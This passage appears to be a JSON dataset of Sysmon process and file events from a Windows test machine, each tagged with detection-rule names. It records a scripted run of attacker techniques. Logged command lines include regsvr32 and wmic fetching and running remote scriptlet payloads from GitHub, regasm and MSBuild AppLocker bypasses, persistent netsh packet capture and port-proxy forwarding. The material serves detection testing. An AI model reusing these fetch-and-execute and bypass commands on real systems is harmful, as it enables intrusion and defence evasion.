21:33:28.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4920,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:29.646278Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-662E-5D3F-0000-001011038900","ProcessId":6020,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:34.216"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4922,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:34.295068Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-662E-5D3F-0000-0010C2048900","ProcessId":1976,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:34.234"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4923,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:34.411034Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6633-5D3F-0000-001051608900","ProcessId":4092,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:39.152"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4925,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:39.312305Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6633-5D3F-0000-001092628900","ProcessId":5056,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:39.223"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4926,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:39.358048Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft .NET Assembly Registration Utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=A580AF099F754953480323F6369E5534261F082E,MD5=E99BD2E860B0D73E55708200A600DA35,SHA256=CD5FBB0AC9EBBD64AE84624D428CE30FF17FD586F71F8C5580BC57B176E6716B,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe /U AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6633-5D3F-0000-001051608900","ParentProcessId":4092,"ProcessGuid":"747F3D96-6633-5D3F-0000-0010D9778900","ProcessId":3512,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:39.751"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4928,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:39.907321Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6638-5D3F-0000-00103DA88900","ParentProcessId":1652,"ProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ProcessId":4288,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:44.622"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4931,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:44.641177Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ProcessId":4288,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-29 21:33:44.806"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4932,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:44.819320Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-6638-5D3F-0000-001067BA8900","ParentProcessId":4288,"ProcessGuid":"747F3D96-6639-5D3F-0000-001074F48900","ProcessId":208,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:45.332"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4933,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:45.581170Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-663D-5D3F-0000-00106F608A00","ProcessId":3240,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:49.535"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4936,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:49.748805Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"MSBuild.exe","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=9672CADE96C657A8860D60923AFDBE4C46A2935D,MD5=4D7D4D92DC7D86B72ABF81821FF83837,SHA256=B60EB62F6C24D4A495A0DAB95CC49624AC5099A2CC21F8BD010A410401AB8CC3,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\MSBuild.exe xxxFile.csproj","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-663D-5D3F-0000-00106F608A00","ParentProcessId":3240,"ProcessGuid":"747F3D96-663D-5D3F-0000-001062708A00","ProcessId":5340,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:49.881"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4938,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:50.104868Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"EventData":{"CommandLine":"wmic process get brief /format:\"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c wmic process get brief /format:\"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6641-5D3F-0000-0010A38C8A00","ParentProcessId":4260,"ProcessGuid":"747F3D96-6642-5D3F-0000-0010F69D8A00","ProcessId":4896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:54.044"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4941,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:54.246154Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-07-29 21:33:54.618","Image":"C:\\Windows\\System32\\Wbem\\WMIC.exe","ProcessGuid":"747F3D96-6642-5D3F-0000-0010F69D8A00","ProcessId":4896,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\LQ86GWLO\\Wmic_calc[1].xsl","UtcTime":"2019-07-29 21:33:54.618"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":4942,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:54.630548Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Capture a Network Trace with netsh.exe"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6646-5D3F-0000-0010E32E8B00","ProcessId":5084,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:58.245"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4945,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:33:58.256845Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Capture a Network Trace with netsh.exe"],"event":{"Event":{"EventData":{"CommandLine":"netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-0010E32E8B00","ParentProcessId":5084,"ProcessGuid":"747F3D96-6647-5D3F-0000-0010AE6E8B00","ProcessId":5056,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.141"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4952,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.420234Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port Forwarding"],"event":{"Event":{"EventData":{"CommandLine":"netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6646-5D3F-0000-0010A7398B00","ParentProcessId":3868,"ProcessGuid":"747F3D96-6647-5D3F-0000-001065758B00","ProcessId":5048,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:59.368"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4954,"Execution_attributes":{"ProcessID":2640,"ThreadID":3476},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-29T21:34:00.442242Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port Forwarding"],"event":{"Event":{"EventData":{"CommandLine":"netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Network Command Shell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=21190DE3629B7A40409897CAF9563EB1EE1944B2,MD5=758B8449357017A158163ECC0E5E52B2,SHA256=D70D165B6706C61C56F2CA91307F4BBDB9846ACAE1DA3CFD84BF978FFB21AF23,IMPHASH=90B4317BE51850B8EF9F14EB56FB7DDC","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 